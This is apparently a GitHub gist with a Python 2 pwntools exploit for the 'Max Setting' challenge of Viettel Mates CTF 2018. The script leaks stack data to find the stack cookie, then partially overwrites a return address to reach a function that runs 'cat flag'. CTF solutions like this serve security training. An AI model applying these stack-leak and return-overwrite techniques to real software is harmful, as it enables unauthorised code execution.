@ManhNDd
Last active June 18, 2018 12:39
Viettel Mates CTF 2018 - Max Setting
'''
author: Nguyen Duc Manh
email: imdb95@gmail.com
'''
# Python 2 / pwntools script (print statements and raw_input are Python 2).
from pwn import *
import sys
import time

if sys.argv[1] == 'local':
    p = process('./maxsetting')
else:
    p = remote('125.235.240.167', 4001)

'''
let's overwrite the return address of read with 0x55555555490E.
+ return address of read: 0xXXXXXXXXXXXXX956
+ address of EzMoney: 0xXXXXXXXXXXXXX90E
=> overwrite the least significant byte with '\x0E' => system(cat flag)
'''

def exploit(retOffset):
    print hex(retOffset)
    p.send(p16(retOffset))
    raw_input('w')
    p.send('\x12')
    p.interactive()

def leak(idx, c):
    p.send(chr(idx))
    time.sleep(0.1)
    p.send(c)
    data = p.recvuntil('\nTry again?\n')
    print [data]
    return data

'''
Sample stack:
0000| 0x7fffffffe3d8 --> 0x55555555496c (<writeANYwhere+75>: )
0008| 0x7fffffffe3e0 --> 0x7ffff7dd2620 --> 0xfbad2087
0016| 0x7fffffffe3e8 --> 0x7ffff7a7cdbd (test DWORD PTR [rbx],0x8000)
0024| 0x7fffffffe3f0 --> 0x7fffffffe3f8 --> 0x9a3d590be410e400
0032| 0x7fffffffe3f8 --> 0x9a3d590be410e400
0040| 0x7fffffffe400 --> 0x7fffffffe410 --> 0x555555554a50 (<__libc_csu_init>: push r15)
0048| 0x7fffffffe408 --> 0x555555554a3e (<main+34>: mov eax,0x0)
0056| 0x7fffffffe410 --> 0x555555554a50 (<__libc_csu_init>: push r15)
=> you can recognize cookie with:
+ its random bytes and one byte '\x00'
+ a qword 0x7fXXXXXXYYXX below
=> use a while loop to search for the cookie. u16(chr(i-16)+chr(YY)) should be the offset of buf.
'''

c = '\x00'
i = 0xf8
while i > 0:
    print hex(i)
    data = leak(i, c)
    if '\x7f' not in data and data.count('\x00') < 2:
        # candidate: look at the next qword and ask the operator to confirm
        i += 8
        p.send('y')
        data = leak(i, c)
        print 'is it cookie (the second last)?'
        uin = raw_input('?')
        print uin
        if 'Y' in uin:
            t2 = ord(data[len('You wrote: \x88')])
            offset = u16(chr(i-16)+chr(t2))
            print hex(offset)
            p.send('y')
            exploit(offset-24)
        i -= 8
    i -= 8
    p.send('y')